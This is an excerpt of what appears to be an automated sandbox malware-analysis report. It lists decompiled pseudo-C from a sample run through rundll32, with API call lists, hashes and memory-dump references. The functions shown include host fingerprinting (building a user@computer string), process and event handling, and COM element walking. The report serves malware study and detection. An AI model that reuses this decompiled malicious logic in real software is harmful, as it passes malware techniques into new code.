                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
                                          • String ID: \
                                          • API String ID: 2598994505-2967466578
                                          • Opcode ID: 78f17da4a81e23b36253f994211a329a39d67d1ec40d1c1f7414ef2a2edbbef3
                                          • Instruction ID: ca527dd61edb63cda3828e11757a1482d0d88fffbec45f8c46a856697ab87458
                                          • Opcode Fuzzy Hash: 78f17da4a81e23b36253f994211a329a39d67d1ec40d1c1f7414ef2a2edbbef3
                                          • Instruction Fuzzy Hash: 9451517290020AEFEFA2AFA0DD44DAE77BAFF04304F048515FA1596164E735D925DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0677614A, Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0677614A() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E067758BE(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E0677147E(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x6775210
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                                          0x06776158
                                          0x0677615b
                                          0x0677615e
                                          0x06776164
                                          0x06776169
                                          0x0677616f
                                          0x06776177
                                          0x0677617a
                                          0x06776180
                                          0x06776185
                                          0x06776192
                                          0x0677619f
                                          0x067761a3
                                          0x067761a5
                                          0x067761a9
                                          0x067761ac
                                          0x067761bc
                                          0x0677620f
                                          0x06776210
                                          0x067761be
                                          0x067761c3
                                          0x067761c4
                                          0x067761c9
                                          0x067761cc
                                          0x067761df
                                          0x00000000
                                          0x067761e1
                                          0x067761e4
                                          0x067761e9
                                          0x067761f7
                                          0x067761fa
                                          0x06776200
                                          0x06776205
                                          0x00000000
                                          0x06776207
                                          0x06776207
                                          0x0677620a
                                          0x0677620a
                                          0x06776205
                                          0x067761df
                                          0x06776215
                                          0x06776216
                                          0x06776185
                                          0x0677621c

                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,0677520E), ref: 0677615E
                                          • GetComputerNameW.KERNEL32(00000000,0677520E), ref: 0677617A
                                            • Part of subcall function 067758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,06771C51), ref: 067758CA
                                          • GetUserNameW.ADVAPI32(00000000,0677520E), ref: 067761B4
                                          • GetComputerNameW.KERNEL32(0677520E,?), ref: 067761D7
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,0677520E,00000000,06775210,00000000,00000000,?,?,0677520E), ref: 067761FA
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                          • String ID:
                                          • API String ID: 3850880919-0
                                          • Opcode ID: 339aec403ee55c0375fd29148359edc9c2e86016e6e0fe83bc79c362565e1e85
                                          • Instruction ID: d7cf35bb3f0cfb4ab7d1f0a1e489e7f14b0f00e6baeffe0aa0def0c68af1932f
                                          • Opcode Fuzzy Hash: 339aec403ee55c0375fd29148359edc9c2e86016e6e0fe83bc79c362565e1e85
                                          • Instruction Fuzzy Hash: 0F21E8B6D00208FFDB51DFE8C984DEEBBBDEF48204B5484AAE601E7204E6309B44DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 067762CD, Relevance: 7.6, APIs: 5, Instructions: 75memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E067762CD(void* __eax, void* _a4, intOrPtr _a8, void* _a12, int _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t36;
				void* _t41;
				char* _t42;
				void* _t44;
				void* _t49;
				void* _t50;
				int _t51;
				int _t54;
				void* _t55;

				_t49 = _a4;
				_t55 = __eax;
				_v12 = 0xb;
				if(_t49 != 0 && __eax != 0) {
					_t5 = _t55 - 1; // -1
					_t42 = _t49 + _t5;
					_t28 =  *_t42;
					_v5 = _t28;
					 *_t42 = 0;
					__imp__(_a8, _t41);
					_v16 = _t28;
					_t50 =  *0x677d114(_t49, _a8);
					if(_t50 != 0) {
						 *_t42 = _v5;
						_t44 = RtlAllocateHeap( *0x677d238, 0, _a16 + __eax);
						if(_t44 == 0) {
							_v12 = 8;
						} else {
							_t51 = _t50 - _a4;
							memcpy(_t44, _a4, _t51);
							_t36 = memcpy(_t44 + _t51, _a12, _a16);
							_t45 = _v16;
							_t54 = _a16;
							memcpy(_t36 + _t54, _t51 + _v16 + _a4, _t55 - _t51 - _t45);
							 *_a20 = _t44;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t55 - _v16 + _t54;
						}
					}
				}
				return _v12;
			}
















                                          0x067762d5
                                          0x067762d8
                                          0x067762da
                                          0x067762e3
                                          0x067762f5
                                          0x067762f5
                                          0x067762f9
                                          0x067762fb
                                          0x067762fe
                                          0x06776301
                                          0x0677630a
                                          0x06776314
                                          0x06776318
                                          0x0677631d
                                          0x06776333
                                          0x06776337
                                          0x06776388
                                          0x06776339
                                          0x06776339
                                          0x06776341
                                          0x06776350
                                          0x06776355
                                          0x06776365
                                          0x0677636b
                                          0x06776376
                                          0x06776380
                                          0x06776384
                                          0x06776384
                                          0x06776337
                                          0x0677638f
                                          0x06776396

                                          APIs
                                          • lstrlen.KERNEL32(7519F710,?,00000000,?,7519F710), ref: 06776301
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0677632D
                                          • memcpy.NTDLL(00000000,0000000B,0000000B), ref: 06776341
                                          • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 06776350
                                          • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 0677636B
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0
                                          • Opcode ID: d00f007caa7040e4351494f3e02436f80fb4e75009f27c52792c9a0287ea22ea
                                          • Instruction ID: 6ed900bbdf8eed4a6b54735d79608273e0428b2956d43a9ff493252333d7448d
                                          • Opcode Fuzzy Hash: d00f007caa7040e4351494f3e02436f80fb4e75009f27c52792c9a0287ea22ea
                                          • Instruction Fuzzy Hash: 41219076900209AFCF129F68CC48AEEBFBAEF85704F058054ED54AB308D731E915CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06779FE7, Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E06779FE7(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E06776B6E(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E0677A96C(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0x677d12c() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                                          0x06779fe7
                                          0x06779ff4
                                          0x06779ff6
                                          0x0677a059
                                          0x00000000
                                          0x0677a059
                                          0x0677a00e
                                          0x0677a015
                                          0x0677a021
                                          0x0677a026
                                          0x0677a028
                                          0x0677a02a
                                          0x0677a02c
                                          0x0677a02e
                                          0x0677a030
                                          0x0677a03c
                                          0x0677a04c
                                          0x00000000
                                          0x0677a03e
                                          0x0677a03e
                                          0x0677a045
                                          0x0677a052
                                          0x0677a052
                                          0x0677a052
                                          0x0677a045
                                          0x0677a03c
                                          0x0677a057
                                          0x00000000
                                          0x00000000
                                          0x0677a05d

                                          APIs
                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,067766AF,?,?,00000000,00000000), ref: 0677A021
                                          • ResetEvent.KERNEL32(?), ref: 0677A026
                                          • GetLastError.KERNEL32 ref: 0677A03E
                                          • GetLastError.KERNEL32(?,?,00000102,067766AF,?,?,00000000,00000000), ref: 0677A059
                                            • Part of subcall function 06776B6E: lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,0677A006,?,?,?,?,00000102,067766AF,?,?,00000000), ref: 06776B7A
                                            • Part of subcall function 06776B6E: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0677A006,?,?,?,?,00000102,067766AF,?), ref: 06776BD8
                                            • Part of subcall function 06776B6E: lstrcpy.KERNEL32(00000000,00000000), ref: 06776BE8
                                          • SetEvent.KERNEL32(?), ref: 0677A04C
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1449191863-0
                                          • Opcode ID: afd0a5854209d878b267067cc4225ee25052926a22d31703cb93c8235ea1da28
                                          • Instruction ID: 55420bc9407e110de31f337cddfbdd2dc07fd92f4365c1d13b02855d914b408b
                                          • Opcode Fuzzy Hash: afd0a5854209d878b267067cc4225ee25052926a22d31703cb93c8235ea1da28
                                          • Instruction Fuzzy Hash: 1B014B31620200ABEE716A71DC44F6FB7AAEF49764F218E24F751D10E0E622E815DAA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06776A7F, Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E06776A7F(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x677d26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x677d25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x677d258 = _t6;
					 *0x677d264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x677d254 = _t7;
					if(_t7 == 0) {
						 *0x677d254 =  *0x677d254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                                          0x06776a87
                                          0x06776a8d
                                          0x06776a94
                                          0x00000000
                                          0x06776aee
                                          0x06776a96
                                          0x06776a9e
                                          0x06776aab
                                          0x06776aab
                                          0x06776aeb
                                          0x00000000
                                          0x06776aeb
                                          0x06776aad
                                          0x06776aad
                                          0x06776ab2
                                          0x06776ac4
                                          0x06776ac9
                                          0x06776acf
                                          0x06776ad5
                                          0x06776adc
                                          0x06776ade
                                          0x06776ade
                                          0x00000000
                                          0x06776ae5
                                          0x06776aa7
                                          0x00000000
                                          0x00000000
                                          0x06776aa9
                                          0x00000000

                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,067790D2,?), ref: 06776A87
                                          • GetVersion.KERNEL32 ref: 06776A96
                                          • GetCurrentProcessId.KERNEL32 ref: 06776AB2
                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 06776ACF
                                          • GetLastError.KERNEL32 ref: 06776AEE
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                          • String ID:
                                          • API String ID: 2270775618-0
                                          • Opcode ID: 79d481eb9d2fdcee13df9241fcb8caab21d2391e40527be7454f4ae6dfe028a7
                                          • Instruction ID: 19d37e36b04ea30c563befeb09325ffa7c302f382915a2b45d3cb92864e8559c
                                          • Opcode Fuzzy Hash: 79d481eb9d2fdcee13df9241fcb8caab21d2391e40527be7454f4ae6dfe028a7
                                          • Instruction Fuzzy Hash: 28F08CB0A607029FDB61CF64AC0AB253B62AF48741F11C01AE742C61DCD670C046CB55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 067791B5, Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 46%
                                          			E067791B5(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x677d2a4; // 0x4ca5a8
					_t5 = _t103 + 0x677e038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x677c298);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x677d2a4; // 0x4ca5a8
												_t28 = _t109 + 0x677e0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x677d2a4; // 0x4ca5a8
														_t33 = _t79 + 0x677e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                                          0x067791ba
                                          0x067791c3
                                          0x067791c4
                                          0x067791c8
                                          0x067791ce
                                          0x067791d4
                                          0x067791dd
                                          0x067791e3
                                          0x067791ed
                                          0x067791ef
                                          0x067791f5
                                          0x067791fa
                                          0x06779205
                                          0x0677920b
                                          0x06779210
                                          0x06779332
                                          0x06779216
                                          0x06779216
                                          0x06779223
                                          0x06779229
                                          0x0677922f
                                          0x06779233
                                          0x06779239
                                          0x06779246
                                          0x0677924a
                                          0x06779250
                                          0x06779253
                                          0x0677925b
                                          0x0677925c
                                          0x06779260
                                          0x06779264
                                          0x06779267
                                          0x0677926a
                                          0x06779270
                                          0x06779279
                                          0x0677927f
                                          0x06779280
                                          0x06779283
                                          0x06779284
                                          0x06779285
                                          0x0677928d
                                          0x0677928e
                                          0x0677928f
                                          0x06779291
                                          0x06779295
                                          0x06779299
                                          0x00000000
                                          0x00000000
                                          0x0677929f
                                          0x067792a8
                                          0x067792ae
                                          0x067792b8
                                          0x067792bc
                                          0x067792be
                                          0x067792cb
                                          0x067792cf
                                          0x067792d7
                                          0x067792dc
                                          0x067792ee
                                          0x067792f0
                                          0x067792f6
                                          0x067792f6
                                          0x067792ff
                                          0x067792ff
                                          0x06779301
                                          0x06779307
                                          0x06779307
                                          0x0677930a
                                          0x06779310
                                          0x06779313
                                          0x0677931c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0677931c
                                          0x06779270
                                          0x0677926a
                                          0x06779253
                                          0x06779322
                                          0x06779322
                                          0x06779328
                                          0x06779328
                                          0x0677932e
                                          0x0677932e
                                          0x06779337
                                          0x0677933d
                                          0x0677933d
                                          0x067791fa
                                          0x06779346

                                          APIs
                                          • SysAllocString.OLEAUT32(0677C298), ref: 06779205
                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 067792E6
                                          • SysFreeString.OLEAUT32(00000000), ref: 067792FF
                                          • SysFreeString.OLEAUT32(?), ref: 0677932E
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloclstrcmp
                                          • String ID:
                                          • API String ID: 1885612795-0
                                          • Opcode ID: fbb251897309ad9fabe0258bcaa5fc292c886ff6a35d9c06a64eaa54b376983a
                                          • Instruction ID: ad5b458c815cd313da7a20862bba0cb38fb1e2ffb5b6f442ecb557a3908c7086
                                          • Opcode Fuzzy Hash: fbb251897309ad9fabe0258bcaa5fc292c886ff6a35d9c06a64eaa54b376983a
                                          • Instruction Fuzzy Hash: F2513E75D00519EFCF01DFA8C888DAEB7BAEF89704B148594EA19EB254D7319D42CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06777664, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 85%
                                          			E06777664(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E067748F0(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E0677748A(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E06777074(_t101,  &_v236, _a8, _t96 - _t81);
					E06777074(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E0677748A(_t101, 0x677d1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E0677748A(_a16, _a4);
						E06772FED(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L0677B088();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L0677B082();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E06776FDC(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E067715CE(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E0677687D(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x677d1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                          0x06777667
                                          0x06777673
                                          0x06777679
                                          0x0677767e
                                          0x06777682
                                          0x067777df
                                          0x067777e3
                                          0x067777e3
                                          0x06777688
                                          0x0677768c
                                          0x06777690
                                          0x06777693
                                          0x0677769e
                                          0x067776a4
                                          0x067776a9
                                          0x067776ac
                                          0x067776c6
                                          0x067776d2
                                          0x067776db
                                          0x067776e5
                                          0x067776ea
                                          0x067776ec
                                          0x067776ef
                                          0x0677779d
                                          0x067777a3
                                          0x067777b4
                                          0x067777c7
                                          0x067777d7
                                          0x00000000
                                          0x067777dc
                                          0x067776f8
                                          0x067776ff
                                          0x06777703
                                          0x06777709
                                          0x0677770b
                                          0x0677770d
                                          0x0677770f
                                          0x06777711
                                          0x0677771b
                                          0x06777720
                                          0x06777722
                                          0x06777724
                                          0x06777725
                                          0x06777726
                                          0x06777727
                                          0x0677772e
                                          0x06777735
                                          0x06777738
                                          0x06777738
                                          0x06777705
                                          0x06777705
                                          0x06777705
                                          0x06777740
                                          0x06777748
                                          0x06777751
                                          0x06777756
                                          0x06777756
                                          0x0677775b
                                          0x00000000
                                          0x00000000
                                          0x0677775d
                                          0x06777760
                                          0x0677776a
                                          0x00000000
                                          0x00000000
                                          0x0677776c
                                          0x0677776c
                                          0x06777776
                                          0x06777756
                                          0x0677775b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0677775b
                                          0x06777780
                                          0x06777783
                                          0x06777786
                                          0x0677778d
                                          0x0677778d
                                          0x0677779a
                                          0x00000000
                                          0x0677779a
                                          0x06777695
                                          0x06777699
                                          0x0677769a
                                          0x0677769c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0677769c
                                          0x00000000

                                          APIs
                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 06777711
                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 06777727
                                          • memset.NTDLL ref: 067777C7
                                          • memset.NTDLL ref: 067777D7
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: memset$_allmul_aulldiv
                                          • String ID:
                                          • API String ID: 3041852380-0
                                          • Opcode ID: 1ac00fc5871e27231bcd3153e212946f6bb607231433a8f7236122ed9e8ef6f4
                                          • Instruction ID: b49b18568d59fcdd8597e177424c04050488212647cce1b179b4c61fba74a8aa
                                          • Opcode Fuzzy Hash: 1ac00fc5871e27231bcd3153e212946f6bb607231433a8f7236122ed9e8ef6f4
                                          • Instruction Fuzzy Hash: 63419531A00249ABDF94DFA8CC84BEE7775EF45710F108529FA25AB184EB719A54CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0677A96C, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(?,00000008,75144D40), ref: 0677A97E
                                            • Part of subcall function 067758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,06771C51), ref: 067758CA
                                          • ResetEvent.KERNEL32(?), ref: 0677A9F2
                                          • GetLastError.KERNEL32 ref: 0677AA15
                                          • GetLastError.KERNEL32 ref: 0677AAC0
                                            • Part of subcall function 0677147E: HeapFree.KERNEL32(00000000,00000000,06771D11,00000000,?,?,-00000008), ref: 0677148A
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
